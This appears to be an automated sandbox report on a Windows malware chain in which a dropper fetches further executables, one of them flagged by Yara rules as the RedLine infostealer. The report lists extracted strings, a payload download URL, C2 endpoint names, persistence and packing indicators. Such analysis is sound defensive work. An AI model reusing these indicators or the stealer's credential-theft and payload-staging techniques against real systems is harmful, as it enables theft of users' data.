Source: 9179bdeb47.exe, 00000007.00000002.2938227361.00000000050BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: 9179bdeb47.exe, 00000007.00000002.2938227361.0000000005051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: 9179bdeb47.exe, 00000007.00000002.2938227361.0000000005051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
Source: 9179bdeb47.exe, 00000007.00000002.2938227361.0000000005051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: 9179bdeb47.exe, 00000007.00000002.2938227361.0000000005051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 9179bdeb47.exe, 00000007.00000002.2938227361.00000000051B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: 9179bdeb47.exe, 00000007.00000002.2938227361.0000000005051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/0
Source: 9179bdeb47.exe, 00000007.00000002.2938227361.0000000005051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
Source: 9179bdeb47.exe, 00000007.00000002.2938227361.0000000005051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
Source: 9179bdeb47.exe, 00000007.00000002.2938227361.00000000050A0000.00000004.00000800.00020000.00000000.sdmp, 9179bdeb47.exe, 00000007.00000002.2938227361.0000000005051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
Source: 9179bdeb47.exe, 00000007.00000002.2938227361.0000000005051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
Source: 9179bdeb47.exe, 00000007.00000002.2938227361.00000000051B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
Source: 9179bdeb47.exe, 00000007.00000002.2938227361.0000000005051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: 9179bdeb47.exe, 00000007.00000002.2938227361.0000000005051000.00000004.00000800.00020000.00000000.sdmp, 9179bdeb47.exe, 00000007.00000002.2938227361.00000000050E1000.00000004.00000800.00020000.00000000.sdmp, 9179bdeb47.exe, 00000007.00000002.2938227361.00000000051B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
Source: 9179bdeb47.exe, 00000007.00000002.2938227361.0000000005051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: 9179bdeb47.exe, 00000007.00000002.2938227361.0000000005051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: 9179bdeb47.exe, 00000007.00000002.2938227361.0000000005051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: Amcache.hve.5.dr	String found in binary or memory: http://upx.sf.net
Source: 9179bdeb47.exe, 00000007.00000003.2740342506.0000000006BD6000.00000004.00000800.00020000.00000000.sdmp, 9179bdeb47.exe, 00000007.00000003.2740342506.0000000006F98000.00000004.00000800.00020000.00000000.sdmp, 9179bdeb47.exe, 00000007.00000003.2740342506.0000000006E39000.00000004.00000800.00020000.00000000.sdmp, 9179bdeb47.exe, 00000007.00000002.2940441075.000000000607A000.00000004.00000800.00020000.00000000.sdmp, tmp3010.tmp.7.dr, tmpFC4B.tmp.7.dr, tmpFA6C.tmp.7.dr, tmpFC0B.tmp.7.dr, tmpFA4B.tmp.7.dr, tmp6347.tmp.7.dr, tmp2FEF.tmp.7.dr, tmp6308.tmp.7.dr, tmpC88B.tmp.7.dr, tmpC89C.tmp.7.dr, tmp2FC0.tmp.7.dr, tmp95E1.tmp.7.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 9179bdeb47.exe, 00000007.00000002.2938227361.00000000050A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb
Source: 9179bdeb47.exe, 00000007.00000002.2938227361.00000000050A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/geoip
Source: 9179bdeb47.exe	String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE
Source: 9179bdeb47.exe, 9179bdeb47.exe, 00000007.00000003.2546762786.0000000004C80000.00000004.00001000.00020000.00000000.sdmp, 9179bdeb47.exe, 00000007.00000002.2932155656.0000000000212000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: 9179bdeb47.exe	String found in binary or memory: https://api.ipify.orgcookies//setti
Source: 9179bdeb47.exe, 9179bdeb47.exe, 00000007.00000003.2546762786.0000000004C80000.00000004.00001000.00020000.00000000.sdmp, 9179bdeb47.exe, 00000007.00000002.2932155656.0000000000212000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: 9179bdeb47.exe, 00000007.00000003.2740342506.0000000006BD6000.00000004.00000800.00020000.00000000.sdmp, 9179bdeb47.exe, 00000007.00000003.2740342506.0000000006F98000.00000004.00000800.00020000.00000000.sdmp, 9179bdeb47.exe, 00000007.00000003.2740342506.0000000006E39000.00000004.00000800.00020000.00000000.sdmp, 9179bdeb47.exe, 00000007.00000002.2940441075.000000000607A000.00000004.00000800.00020000.00000000.sdmp, tmp3010.tmp.7.dr, tmpFC4B.tmp.7.dr, tmpFA6C.tmp.7.dr, tmpFC0B.tmp.7.dr, tmpFA4B.tmp.7.dr, tmp6347.tmp.7.dr, tmp2FEF.tmp.7.dr, tmp6308.tmp.7.dr, tmpC88B.tmp.7.dr, tmpC89C.tmp.7.dr, tmp2FC0.tmp.7.dr, tmp95E1.tmp.7.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 9179bdeb47.exe, 00000007.00000003.2740342506.0000000006BD6000.00000004.00000800.00020000.00000000.sdmp, 9179bdeb47.exe, 00000007.00000003.2740342506.0000000006F98000.00000004.00000800.00020000.00000000.sdmp, 9179bdeb47.exe, 00000007.00000003.2740342506.0000000006E39000.00000004.00000800.00020000.00000000.sdmp, 9179bdeb47.exe, 00000007.00000002.2940441075.000000000607A000.00000004.00000800.00020000.00000000.sdmp, tmp3010.tmp.7.dr, tmpFC4B.tmp.7.dr, tmpFA6C.tmp.7.dr, tmpFC0B.tmp.7.dr, tmpFA4B.tmp.7.dr, tmp6347.tmp.7.dr, tmp2FEF.tmp.7.dr, tmp6308.tmp.7.dr, tmpC88B.tmp.7.dr, tmpC89C.tmp.7.dr, tmp2FC0.tmp.7.dr, tmp95E1.tmp.7.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 9179bdeb47.exe, 00000007.00000003.2740342506.0000000006BD6000.00000004.00000800.00020000.00000000.sdmp, 9179bdeb47.exe, 00000007.00000003.2740342506.0000000006F98000.00000004.00000800.00020000.00000000.sdmp, 9179bdeb47.exe, 00000007.00000003.2740342506.0000000006E39000.00000004.00000800.00020000.00000000.sdmp, 9179bdeb47.exe, 00000007.00000002.2940441075.000000000607A000.00000004.00000800.00020000.00000000.sdmp, tmp3010.tmp.7.dr, tmpFC4B.tmp.7.dr, tmpFA6C.tmp.7.dr, tmpFC0B.tmp.7.dr, tmpFA4B.tmp.7.dr, tmp6347.tmp.7.dr, tmp2FEF.tmp.7.dr, tmp6308.tmp.7.dr, tmpC88B.tmp.7.dr, tmpC89C.tmp.7.dr, tmp2FC0.tmp.7.dr, tmp95E1.tmp.7.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 9179bdeb47.exe, 00000007.00000003.2740342506.0000000006BD6000.00000004.00000800.00020000.00000000.sdmp, 9179bdeb47.exe, 00000007.00000003.2740342506.0000000006F98000.00000004.00000800.00020000.00000000.sdmp, 9179bdeb47.exe, 00000007.00000003.2740342506.0000000006E39000.00000004.00000800.00020000.00000000.sdmp, 9179bdeb47.exe, 00000007.00000002.2940441075.000000000607A000.00000004.00000800.00020000.00000000.sdmp, tmp3010.tmp.7.dr, tmpFC4B.tmp.7.dr, tmpFA6C.tmp.7.dr, tmpFC0B.tmp.7.dr, tmpFA4B.tmp.7.dr, tmp6347.tmp.7.dr, tmp2FEF.tmp.7.dr, tmp6308.tmp.7.dr, tmpC88B.tmp.7.dr, tmpC89C.tmp.7.dr, tmp2FC0.tmp.7.dr, tmp95E1.tmp.7.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 9179bdeb47.exe, 00000007.00000003.2740342506.0000000006BD6000.00000004.00000800.00020000.00000000.sdmp, 9179bdeb47.exe, 00000007.00000003.2740342506.0000000006F98000.00000004.00000800.00020000.00000000.sdmp, 9179bdeb47.exe, 00000007.00000003.2740342506.0000000006E39000.00000004.00000800.00020000.00000000.sdmp, 9179bdeb47.exe, 00000007.00000002.2940441075.000000000607A000.00000004.00000800.00020000.00000000.sdmp, tmp3010.tmp.7.dr, tmpFC4B.tmp.7.dr, tmpFA6C.tmp.7.dr, tmpFC0B.tmp.7.dr, tmpFA4B.tmp.7.dr, tmp6347.tmp.7.dr, tmp2FEF.tmp.7.dr, tmp6308.tmp.7.dr, tmpC88B.tmp.7.dr, tmpC89C.tmp.7.dr, tmp2FC0.tmp.7.dr, tmp95E1.tmp.7.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 9179bdeb47.exe, 00000007.00000003.2740342506.0000000006BD6000.00000004.00000800.00020000.00000000.sdmp, 9179bdeb47.exe, 00000007.00000003.2740342506.0000000006F98000.00000004.00000800.00020000.00000000.sdmp, 9179bdeb47.exe, 00000007.00000003.2740342506.0000000006E39000.00000004.00000800.00020000.00000000.sdmp, 9179bdeb47.exe, 00000007.00000002.2940441075.000000000607A000.00000004.00000800.00020000.00000000.sdmp, tmp3010.tmp.7.dr, tmpFC4B.tmp.7.dr, tmpFA6C.tmp.7.dr, tmpFC0B.tmp.7.dr, tmpFA4B.tmp.7.dr, tmp6347.tmp.7.dr, tmp2FEF.tmp.7.dr, tmp6308.tmp.7.dr, tmpC88B.tmp.7.dr, tmpC89C.tmp.7.dr, tmp2FC0.tmp.7.dr, tmp95E1.tmp.7.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: xclient.exe.5.dr	String found in binary or memory: https://fonts.googleapis.com/css2?family=Nunito&display=swap
Source: skotes.exe, 00000005.00000003.2473257997.0000000001490000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.copis.co
Source: skotes.exe, 00000005.00000003.2473257997.0000000001490000.00000004.00000020.00020000.00000000.sdmp, xclient.exe.5.dr	String found in binary or memory: https://fonts.gstatic.com
Source: 9179bdeb47.exe, 9179bdeb47.exe, 00000007.00000003.2546762786.0000000004C80000.00000004.00001000.00020000.00000000.sdmp, 9179bdeb47.exe, 00000007.00000002.2932155656.0000000000212000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: skotes.exe, 00000005.00000002.4515481646.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tmpfiles.org/
Source: skotes.exe, 00000005.00000002.4515481646.000000000143C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tmpfiles.org/dl/20891284/xclient.exe
Source: skotes.exe, 00000005.00000002.4515481646.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tmpfiles.org/dl/20891284/xclient.exeX
Source: skotes.exe, 00000005.00000003.2473257997.0000000001495000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tmpfiles.org/dl/20891284/xclient.exeia1
Source: skotes.exe, 00000005.00000002.4515481646.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tmpfiles.org/dl/20891284/xclient.exej
Source: skotes.exe, 00000005.00000003.2473257997.0000000001495000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tmpfiles.org/dl/20891284/xclient.exemv
Source: skotes.exe, 00000005.00000003.2473257997.0000000001495000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tmpfiles.org/dl/20891284/xclient.exeompany
Source: 9179bdeb47.exe, 00000007.00000003.2740342506.0000000006BD6000.00000004.00000800.00020000.00000000.sdmp, 9179bdeb47.exe, 00000007.00000003.2740342506.0000000006F98000.00000004.00000800.00020000.00000000.sdmp, 9179bdeb47.exe, 00000007.00000003.2740342506.0000000006E39000.00000004.00000800.00020000.00000000.sdmp, 9179bdeb47.exe, 00000007.00000002.2940441075.000000000607A000.00000004.00000800.00020000.00000000.sdmp, tmp3010.tmp.7.dr, tmpFC4B.tmp.7.dr, tmpFA6C.tmp.7.dr, tmpFC0B.tmp.7.dr, tmpFA4B.tmp.7.dr, tmp6347.tmp.7.dr, tmp2FEF.tmp.7.dr, tmp6308.tmp.7.dr, tmpC88B.tmp.7.dr, tmpC89C.tmp.7.dr, tmp2FC0.tmp.7.dr, tmp95E1.tmp.7.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: 9179bdeb47.exe, 00000007.00000003.2740342506.0000000006BD6000.00000004.00000800.00020000.00000000.sdmp, 9179bdeb47.exe, 00000007.00000003.2740342506.0000000006F98000.00000004.00000800.00020000.00000000.sdmp, 9179bdeb47.exe, 00000007.00000003.2740342506.0000000006E39000.00000004.00000800.00020000.00000000.sdmp, 9179bdeb47.exe, 00000007.00000002.2940441075.000000000607A000.00000004.00000800.00020000.00000000.sdmp, tmp3010.tmp.7.dr, tmpFC4B.tmp.7.dr, tmpFA6C.tmp.7.dr, tmpFC0B.tmp.7.dr, tmpFA4B.tmp.7.dr, tmp6347.tmp.7.dr, tmp2FEF.tmp.7.dr, tmp6308.tmp.7.dr, tmpC88B.tmp.7.dr, tmpC89C.tmp.7.dr, tmp2FC0.tmp.7.dr, tmp95E1.tmp.7.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49868

Source: unknown

HTTPS traffic detected: 104.21.21.16:443 -> 192.168.2.5:49868 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 7.2.9179bdeb47.exe.210000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 7.2.9179bdeb47.exe.210000.0.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 7.2.9179bdeb47.exe.210000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000007.00000003.2546762786.0000000004C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000007.00000002.2932155656.0000000000212000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: 9179bdeb47.exe PID: 6528, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown

PE file contains section with special chars

Source: TxTPu961er.exe	Static PE information: section name:
Source: TxTPu961er.exe	Static PE information: section name: .idata
Source: TxTPu961er.exe	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:
Source: random[1].exe.5.dr	Static PE information: section name:
Source: random[1].exe.5.dr	Static PE information: section name: .idata
Source: random[1].exe.5.dr	Static PE information: section name:
Source: 9179bdeb47.exe.5.dr	Static PE information: section name:
Source: 9179bdeb47.exe.5.dr	Static PE information: section name: .idata
Source: 9179bdeb47.exe.5.dr	Static PE information: section name:
Source: random[1].exe0.5.dr	Static PE information: section name:
Source: random[1].exe0.5.dr	Static PE information: section name: .idata
Source: random[1].exe0.5.dr	Static PE information: section name:
Source: d34ebbe5f2.exe.5.dr	Static PE information: section name:
Source: d34ebbe5f2.exe.5.dr	Static PE information: section name: .idata
Source: d34ebbe5f2.exe.5.dr	Static PE information: section name:
Source: tmp6E9C.tmp.7.dr	Static PE information: section name:
Source: tmp6E9C.tmp.7.dr	Static PE information: section name: .idata
Source: tmp6E9C.tmp.7.dr	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\TxTPu961er.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_008BE530	5_2_008BE530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_008F78BB	5_2_008F78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_008F7049	5_2_008F7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_008F8860	5_2_008F8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_008F31A8	5_2_008F31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_008B4DE0	5_2_008B4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_008F2D10	5_2_008F2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_008F779B	5_2_008F779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_008E7F36	5_2_008E7F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_008B4B30	5_2_008B4B30
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Code function: 7_2_04E4E7B0	7_2_04E4E7B0
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Code function: 7_2_04E4DC90	7_2_04E4DC90
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Code function: 7_2_0861DD00	7_2_0861DD00
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Code function: 7_2_0861D108	7_2_0861D108
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Code function: 7_2_08611210	7_2_08611210
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Code function: 7_2_08613311	7_2_08613311
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Code function: 7_2_08614468	7_2_08614468
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Code function: 7_2_08619628	7_2_08619628
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Code function: 7_2_09B1CAF0	7_2_09B1CAF0
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Code function: 7_2_09B1AA38	7_2_09B1AA38
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Code function: 7_2_09B1E400	7_2_09B1E400
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Code function: 7_2_09B197C0	7_2_09B197C0
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Code function: 7_2_09B12960	7_2_09B12960
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Code function: 7_2_09B130F8	7_2_09B130F8
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Code function: 7_2_09B130E8	7_2_09B130E8
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Code function: 7_2_09B10040	7_2_09B10040
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Code function: 7_2_0A22E320	7_2_0A22E320
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Code function: 7_2_0A220360	7_2_0A220360
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Code function: 7_2_0A2216C0	7_2_0A2216C0
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Code function: 7_2_0A2552E0	7_2_0A2552E0
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Code function: 7_2_0A250590	7_2_0A250590
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Code function: 7_2_0A254BF8	7_2_0A254BF8
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Code function: 7_2_0A257208	7_2_0A257208
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Code function: 7_2_0A2571F9	7_2_0A2571F9

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe 1E9FF1FC659F304A408CFF60895EF815D0A9D669A3D462E0046F55C8C6FEAFC2

Source: TxTPu961er.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 7.2.9179bdeb47.exe.210000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 7.2.9179bdeb47.exe.210000.0.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 7.2.9179bdeb47.exe.210000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000007.00000003.2546762786.0000000004C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000007.00000002.2932155656.0000000000212000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: 9179bdeb47.exe PID: 6528, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23

Source: TxTPu961er.exe	Static PE information: Section: ihwqqeol ZLIB complexity 0.9946385767054385
Source: skotes.exe.0.dr	Static PE information: Section: ihwqqeol ZLIB complexity 0.9946385767054385
Source: random[1].exe.5.dr	Static PE information: Section: ZLIB complexity 0.9962366615853658
Source: random[1].exe.5.dr	Static PE information: Section: efrqcofg ZLIB complexity 0.9946268992219612
Source: 9179bdeb47.exe.5.dr	Static PE information: Section: ZLIB complexity 0.9962366615853658
Source: 9179bdeb47.exe.5.dr	Static PE information: Section: efrqcofg ZLIB complexity 0.9946268992219612
Source: random[1].exe0.5.dr	Static PE information: Section: gkomoxhs ZLIB complexity 0.9948653058307927
Source: d34ebbe5f2.exe.5.dr	Static PE information: Section: gkomoxhs ZLIB complexity 0.9948653058307927
Source: tmp6E9C.tmp.7.dr	Static PE information: Section: ihwqqeol ZLIB complexity 0.9946385767054385

Source: random[1].exe.5.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: 9179bdeb47.exe.5.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: random[1].exe0.5.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: d34ebbe5f2.exe.5.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@11/109@3/6

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3376:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d

Source: C:\Users\user\Desktop\TxTPu961er.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Source: C:\Users\user\Desktop\TxTPu961er.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\TxTPu961er.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 9179bdeb47.exe, 00000007.00000003.2733993677.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, 9179bdeb47.exe, 00000007.00000003.2764918581.0000000008DFB000.00000004.00000020.00020000.00000000.sdmp, 9179bdeb47.exe, 00000007.00000003.2765651495.0000000008DB5000.00000004.00000020.00020000.00000000.sdmp, tmp5D03.tmp.7.dr, tmp5E60.tmp.7.dr, tmp2BFD.tmp.7.dr, tmp2C1E.tmp.7.dr, tmpFA9B.tmp.7.dr, tmpBD1D.tmp.7.dr, tmp2C0E.tmp.7.dr, tmp5E81.tmp.7.dr, tmpC80A.tmp.7.dr, tmp2916.tmp.7.dr, tmp5E61.tmp.7.dr, tmp5D14.tmp.7.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: TxTPu961er.exe	ReversingLabs: Detection: 56%
Source: TxTPu961er.exe	Virustotal: Detection: 59%

Source: TxTPu961er.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 9179bdeb47.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 9179bdeb47.exe	String found in binary or memory: 3The file %s is missing. Please, re-install this application
Source: d34ebbe5f2.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\TxTPu961er.exe

File read: C:\Users\user\Desktop\TxTPu961er.exe

Jump to behavior

